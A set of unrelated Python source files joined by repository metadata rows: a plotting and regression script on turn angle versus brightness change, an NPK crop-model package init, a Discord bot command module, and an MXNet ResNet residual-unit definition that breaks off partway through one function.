Rs_shuffled_raw.append(real_R_shuffled_raw)
Rs_shuffled_median = np.array(Rs_shuffled_median)
Rs_shuffled_raw = np.array(Rs_shuffled_raw)
p_median = np.sum(Rs_shuffled_median > real_R_median)/len(Rs_shuffled_median)
p_raw = np.sum(Rs_shuffled_raw > real_R_raw) / len(Rs_shuffled_raw)
myfig.Line(p0, x=np.array([0, 180]),
y=reg_median.coef_[0][0]*np.array([0, 180]) + reg_median.intercept_[0],
lc=color, lw=0.5, zorder=6, label=f'R2 = {real_R_median:.3f}, p = {p_median:.3f}\ny = {reg_median.coef_[0][0]:.3f}*x + {reg_median.intercept_[0]:.2f}')
myfig.Line(p0, x=np.array([0, 180]),
y=reg_raw.coef_[0][0]*np.array([0, 180]) + reg_raw.intercept_[0],
lc=color, dashes=(2,2), lw=0.5, zorder=6, label=f'R2 = {real_R_raw:.3f}, p = {p_raw:.3f}\ny = {reg_raw.coef_[0][0]:.3f}*x + {reg_raw.intercept_[0]:.2f}')
#######
# The luminance change
p0 = myfig.Plot(fig, num='b', xpos=16, ypos=ypos, plot_height=1.25, plot_width=2,
lw=1, pc='white', errorbar_area=False,
xl="Brightness change\nsince previous turn", xmin=-65, xmax=65, xticks=[-60, -30, 0, 30, 60],
yl="Absolute turn angle", ymin=-1, ymax=41, yticks=[0, 20, 40])
df_selected1 = df_selected.query("luminance_change_since_previous_turn_event > -61 and "
"luminance_change_since_previous_turn_event < 61 and "
"angle_change_at_current_turn_event < 41 and "
"angle_change_at_current_turn_event > -41")[["luminance_change_since_previous_turn_event",
"angle_change_at_current_turn_event"]]
linear_regressor = LinearRegression() # create object for the class
myfig.Scatter(p0, x=df_selected1["luminance_change_since_previous_turn_event"],
y=df_selected1["angle_change_at_current_turn_event"].abs(),
lc=None, lw=0, pt='.', ps=1, pc=color, zorder=4, alpha=0.3)
bins = np.arange(-60, 61, 30)
vals = []
for bin in bins:
df_ = df_selected1.query("luminance_change_since_previous_turn_event < (@bin + 15) and luminance_change_since_previous_turn_event > (@bin - 15)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
myfig.Scatter(p0, x=bins, y=vals, lw=0, pt='.', ps=12, pc=color, zorder=5)
X_median = np.array(bins).reshape(-1, 1)
Y_median = np.array(vals).reshape(-1, 1)
X_raw = np.array(df_selected1["luminance_change_since_previous_turn_event"]).reshape(-1, 1)
Y_raw = np.array(df_selected1["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_median = LinearRegression() # create object for the class
reg_median = linear_regressor_median.fit(X_median, Y_median) # perform linear regression
Y_pred_median = linear_regressor_median.predict(X_median) # make predictions
real_R_median = reg_median.score(X_median, Y_median)
linear_regressor_raw = LinearRegression() # create object for the class
reg_raw = linear_regressor_raw.fit(X_raw, Y_raw) # perform linear regression
Y_pred_raw = linear_regressor_raw.predict(X_raw) # make predictions
real_R_raw = reg_raw.score(X_raw, Y_raw)
# Repeat this but with shuffled data
Rs_shuffled_raw = []
Rs_shuffled_median = []
for shuffle_i in range(1000):
df_selected_shuffled = df_selected1.apply(lambda df_selected1: df_selected1.sample(frac=1).values)
bins = np.arange(-60, 61, 30)
vals = []
for bin in bins:
df_ = df_selected_shuffled.query("luminance_change_since_previous_turn_event < (@bin + 15) and luminance_change_since_previous_turn_event > (@bin - 15)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
X_shuffled_median = np.array(bins).reshape(-1, 1)
Y_shuffled_median = np.array(vals).reshape(-1, 1)
X_shuffled_raw = np.array(df_selected_shuffled["luminance_change_since_previous_turn_event"]).reshape(-1, 1)
Y_shuffled_raw = np.array(df_selected_shuffled["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_shuffled_median = LinearRegression() # create object for the class
reg_shuffled_median = linear_regressor_shuffled_median.fit(X_shuffled_median,
Y_shuffled_median) # perform linear regression
Y_pred_shuffled_median = linear_regressor_shuffled_median.predict(X_shuffled_median) # make predictions
real_R_shuffled_median = reg_shuffled_median.score(X_shuffled_median, Y_shuffled_median)
linear_regressor_shuffled_raw = LinearRegression() # create object for the class
reg_shuffled_raw = linear_regressor_shuffled_raw.fit(X_shuffled_raw,
Y_shuffled_raw) # perform linear regression
Y_pred_shuffled_raw = linear_regressor_shuffled_raw.predict(X_shuffled_raw) # make predictions
real_R_shuffled_raw = reg_raw.score(X_shuffled_raw, Y_shuffled_raw)
Rs_shuffled_median.append(real_R_shuffled_median)
Rs_shuffled_raw.append(real_R_shuffled_raw)
Rs_shuffled_median = np.array(Rs_shuffled_median)
Rs_shuffled_raw = np.array(Rs_shuffled_raw)
p_median = np.sum(Rs_shuffled_median > real_R_median) / len(Rs_shuffled_median)
p_raw = np.sum(Rs_shuffled_raw > real_R_raw) / len(Rs_shuffled_raw)
myfig.Line(p0, x=np.array([-61, 61]),
y=reg_median.coef_[0][0] * np.array([-61, 61]) + reg_median.intercept_[0],
lc='black', lw=0.5, zorder=6,
label=f'R2 = {real_R_median:.3f}, p = {p_median:.3f}\ny = {reg_median.coef_[0][0]:.3f}*x + {reg_median.intercept_[0]:.2f}')
myfig.Line(p0, x=np.array([-61, 61]),
y=reg_raw.coef_[0][0] * np.array([-61, 61]) + reg_raw.intercept_[0],
lc='black', dashes=(2, 2), lw=0.5, zorder=6,
label=f'R2 = {real_R_raw:.3f}, p = {p_raw:.3f}\ny = {reg_raw.coef_[0][0]:.3f}*x + {reg_raw.intercept_[0]:.2f}')
fig.savepdf(root_path / f"figure2_model_profile1", open_pdf=True) | 55.420225 | 234 | 0.629957 | 3,688 | 24,662 | 3.933297 | 0.077278 | 0.051496 | 0.054047 | 0.05708 | 0.898938 | 0.871295 | 0.83462 | 0.800221 | 0.775059 | 0.767958 | 0 | 0.059317 | 0.226178 | 24,662 | 445 | 235 | 55.420225 | 0.700744 | 0.051902 | 0 | 0.490446 | 0 | 0.012739 | 0.243949 | 0.142396 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022293 | 0 | 0.022293 | 0.006369 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b0ce5a490a04b990f270b040b32dc932b4140c9 | 181 | py | Python | main/pcse/crop/nutrients/__init__.py | jajberni/pcse_web | 284b35270061fee61040f41df419cbf9eea32a2e | [
"Apache-2.0"
] | 3 | 2017-09-19T10:38:50.000Z | 2019-10-07T03:47:02.000Z | main/pcse/crop/nutrients/__init__.py | jajberni/pcse_web | 284b35270061fee61040f41df419cbf9eea32a2e | [
"Apache-2.0"
] | null | null | null | main/pcse/crop/nutrients/__init__.py | jajberni/pcse_web | 284b35270061fee61040f41df419cbf9eea32a2e | [
"Apache-2.0"
] | 1 | 2019-10-31T01:11:06.000Z | 2019-10-31T01:11:06.000Z | from .npk_stress import NPK_Stress
from .npk_demand_uptake import NPK_Demand_Uptake
from .npk_translocation import NPK_Translocation
from .npk_soil_dynamics import NPK_Soil_Dynamics | 45.25 | 48 | 0.895028 | 28 | 181 | 5.357143 | 0.321429 | 0.186667 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082873 | 181 | 4 | 49 | 45.25 | 0.903614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d99ec45fe2e564b1d9b99285f9bce968bca3dee1 | 1,130 | py | Python | examples/example_without_CommandSet/my_commands.py | LeConstellationniste/DiscordFramework | 24d4b9b7cb0a21d3cec9d5362ab0828c5e15a3af | [
"CC0-1.0"
] | 1 | 2021-01-27T14:55:03.000Z | 2021-01-27T14:55:03.000Z | examples/example_without_CommandSet/my_commands.py | LeConstellationniste/DiscordFramework | 24d4b9b7cb0a21d3cec9d5362ab0828c5e15a3af | [
"CC0-1.0"
] | null | null | null | examples/example_without_CommandSet/my_commands.py | LeConstellationniste/DiscordFramework | 24d4b9b7cb0a21d3cec9d5362ab0828c5e15a3af | [
"CC0-1.0"
] | null | null | null | import asyncio
import discord
# Just function to add to the bot
async def hello(message):
await message.channel.send(f"Hello {message.author.mention}!", reference=message.to_reference())
async def admin(message):
await message.channel.send(f"Hello {message.author.mention}! You are administrator!", reference=message.to_reference())
async def product(message, a: int, b: int):
await message.channel.send(f"`{a}*{b} = {a*b}`", reference=message.to_reference())
# Or Command create with this function
from discordEasy.objects import Command, CommandAdmin
async def hello(message):
await message.channel.send(f"Hello {message.author.mention}!", reference=message.to_reference())
async def admin(message):
await message.channel.send(f"Hello {message.author.mention}! You are administrator!", reference=message.to_reference())
async def product(message, a: int, b: int):
await message.channel.send(f"`{a}*{b} = {a*b}`", reference=message.to_reference())
cmd_hello = Command(hello, name="Hello", aliases=("hello", "Hi", "hi"))
cmd_admin = CommandAdmin(admin, name="Admin")
cmd_product = Command(product, name="Product") | 36.451613 | 120 | 0.746903 | 161 | 1,130 | 5.186335 | 0.254658 | 0.057485 | 0.136527 | 0.165269 | 0.708982 | 0.708982 | 0.708982 | 0.708982 | 0.708982 | 0.708982 | 0 | 0 | 0.1 | 1,130 | 31 | 121 | 36.451613 | 0.821042 | 0.060177 | 0 | 0.666667 | 0 | 0 | 0.216981 | 0.09434 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d9a34cde8f8fd485bd0bfabaa246df7d01603a41 | 32,869 | py | Python | recognition/symbol/fresnet.py | zzdang/match_fashion | fb08b2f42d382a947b40bf197def85ea9ddd26af | [
"MIT"
] | 4 | 2020-05-14T03:10:17.000Z | 2021-07-07T03:10:22.000Z | recognition/symbol/fresnet.py | zzdang/match_fashion | fb08b2f42d382a947b40bf197def85ea9ddd26af | [
"MIT"
] | null | null | null | recognition/symbol/fresnet.py | zzdang/match_fashion | fb08b2f42d382a947b40bf197def85ea9ddd26af | [
"MIT"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''
Adapted from https://github.com/tornadomeet/ResNet/blob/master/symbol_resnet.py
Original author Wei Wu
Implemented the following paper:
Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun. "Identity Mappings in Deep Residual Networks"
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import mxnet as mx
import numpy as np
import symbol_utils
import memonger
import sklearn
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from sample_config import config
def Conv(**kwargs):
#name = kwargs.get('name')
#_weight = mx.symbol.Variable(name+'_weight')
#_bias = mx.symbol.Variable(name+'_bias', lr_mult=2.0, wd_mult=0.0)
#body = mx.sym.Convolution(weight = _weight, bias = _bias, **kwargs)
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def residual_unit_v1(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit1')
if bottle_neck:
conv1 = Conv(data=data, num_filter=int(num_filter*0.25), kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn3 = mx.symbol.broadcast_mul(bn3, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn3 + shortcut, act_type=act_type, name=name + '_relu3')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn2, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn2 = mx.symbol.broadcast_mul(bn2, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn2 + shortcut, act_type=act_type, name=name + '_relu3')
def residual_unit_v1_L(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit1')
if bottle_neck:
conv1 = Conv(data=data, num_filter=int(num_filter*0.25), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn3 = mx.symbol.broadcast_mul(bn3, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn3 + shortcut, act_type=act_type, name=name + '_relu3')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn2, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn2 = mx.symbol.broadcast_mul(bn2, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn2 + shortcut, act_type=act_type, name=name + '_relu3')
def residual_unit_v2(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit2')
if bottle_neck:
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
act3 = Act(data=bn3, act_type=act_type, name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
if use_se:
#se begin
body = mx.sym.Pooling(data=conv3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
conv3 = mx.symbol.broadcast_mul(conv3, body)
if dim_match:
shortcut = data
else:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
else:
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
if use_se:
#se begin
body = mx.sym.Pooling(data=conv2, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
conv2 = mx.symbol.broadcast_mul(conv2, body)
if dim_match:
shortcut = data
else:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv2 + shortcut
def residual_unit_v3(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit3')
if bottle_neck:
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
conv1 = Conv(data=bn1, num_filter=int(num_filter*0.25), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act1 = Act(data=bn2, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
act2 = Act(data=bn3, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn4 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn4, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn4 = mx.symbol.broadcast_mul(bn4, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return bn4 + shortcut
else:
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
conv1 = Conv(data=bn1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act1 = Act(data=bn2, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn3 = mx.symbol.broadcast_mul(bn3, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return bn3 + shortcut
def residual_unit_v3_x(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNeXt Unit symbol for building ResNeXt
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
assert(bottle_neck)
use_se = kwargs.get('version_se', 1)
